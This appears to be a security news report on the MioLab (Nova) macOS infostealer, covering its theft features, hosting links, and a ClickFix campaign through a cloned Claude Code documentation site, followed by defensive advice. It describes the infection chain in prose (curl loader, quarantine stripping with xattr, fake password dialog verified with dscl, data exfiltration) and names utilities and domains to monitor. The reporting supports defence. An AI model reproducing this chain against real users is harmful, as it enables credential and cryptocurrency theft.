A sophisticated macOS infostealer named MioLab, also known as Nova, has rapidly emerged as one of the most advanced Malware-as-a-Service (MaaS) platforms targeting Apple users. Advertised on Russian-speaking underground forums, MioLab signifies a significant shift in the threat landscape, demonstrating that macOS is no longer a low-risk target for cyber attackers. As Apple’s market share continues to grow among professionals, including software engineers, executives, and cryptocurrency investors, Macs are increasingly being treated as highly profitable attack surfaces by malicious actors.
The malware itself is characterized by a user-friendly web panel and a compact C payload, compiling to approximately 100 KB. This lean design aids in evading basic signature-based antivirus detection. MioLab supports both Intel x86-64 and Apple Silicon ARM64 architectures, functioning across macOS versions from Sierra through Tahoe. Its core capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of passwords from password managers, and general file collection. Furthermore, a premium add-on module specifically targets hardware wallets like Ledger and Trezor, with the alarming ability to steal a victim’s 24-word BIP39 recovery seed phrases.
MioLab’s Evolving Arsenal and Delivery Tactics
MioLab is identified by LevelBlue analysts as a rapidly evolving threat, with its development pace being unusually fast for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed critical upgrades. These include a significantly rebuilt hardware wallet extraction module, the capability to decrypt Apple Notes directly on the device, a functional Safari cookie grabber, and a comprehensive Team API. This API allows criminal teams to programmatically generate payloads and download stolen logs without needing to log into the main web panel. The platform also integrates Telegram bot binding, providing real-time victim notifications and serving organized cybercriminal affiliates, often referred to as “traffers.”
Infrastructure analysis has revealed that MioLab’s operators are involved in a broader cybercrime ecosystem. The malware’s administration panel was previously hosted on playavalon[.]org. This domain has since been rotated to serve an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old indicators into fresh fraudulent activity. Both of these operations can be traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand, which is known for shielding multiple malware families from law enforcement scrutiny.
ClickFix Delivery: Exploiting User Trust Through the Terminal
One of MioLab’s most notable recent additions is its ClickFix infection chain. This technique is designed to trick victims into executing malicious commands directly within their macOS Terminal application. The malware’s panel features a one-click utility where operators can input their server credentials. The system then instantly generates a Terminal payload ready for deployment. This payload can be distributed through deceptive methods such as fake CAPTCHA pages or cloned developer portals.
Shortly before this report’s publication, security researcher Marcelo Rivero identified a live malvertising campaign actively distributing MioLab. This campaign employed a convincing clone of the Claude Code documentation site, which is a legitimate command-line AI tool developed by Anthropic. The campaign was meticulously crafted for high-value targets, particularly developers who are already accustomed to running commands in the Terminal. For Windows visitors, the cloned site presented entirely legitimate installation instructions, appearing perfectly benign upon casual inspection.
However, for macOS users, the site delivered a ClickFix-style payload. The initial stage of the infection relies on a Base64-masked URL. Once decoded and executed, this URL launches a curl loader. This loader fetches the Mach-O payload, drops it into the /tmp directory, and then executes an `xattr -c` command. This command is used to strip Apple’s Quarantine attribute, thereby bypassing the Gatekeeper security feature of macOS.
Once past Gatekeeper, the malware proceeds to terminate any open Terminal windows. It then presents a fake System Preferences password dialog, generated via AppleScript, which effectively tricks users into entering their login credentials. The captured password is subsequently verified against the local directory service using the `dscl` utility. Upon successful verification, MioLab commences its data exfiltration process. This includes collecting browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. Finally, all collected data is compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.
To defend against MioLab and similar threats, both individual users and security teams must implement robust protective measures. Users need to be educated to question any unexpected password prompts, especially those appearing from applications that were recently downloaded or are not from trusted sources. Security teams should focus on blocking or closely monitoring the use of sensitive system utilities, such as `dscl`, `osascript`, and `system_profiler`, particularly when they are invoked by unsigned applications. Access to browser profile directories and the macOS Keychain file `login.keychain-db` should be strictly audited. Furthermore, known malicious domains, including `socifiapp[.]com`, must be blocked, and any suspicious `curl` POST requests directed towards external APIs should be flagged and thoroughly investigated.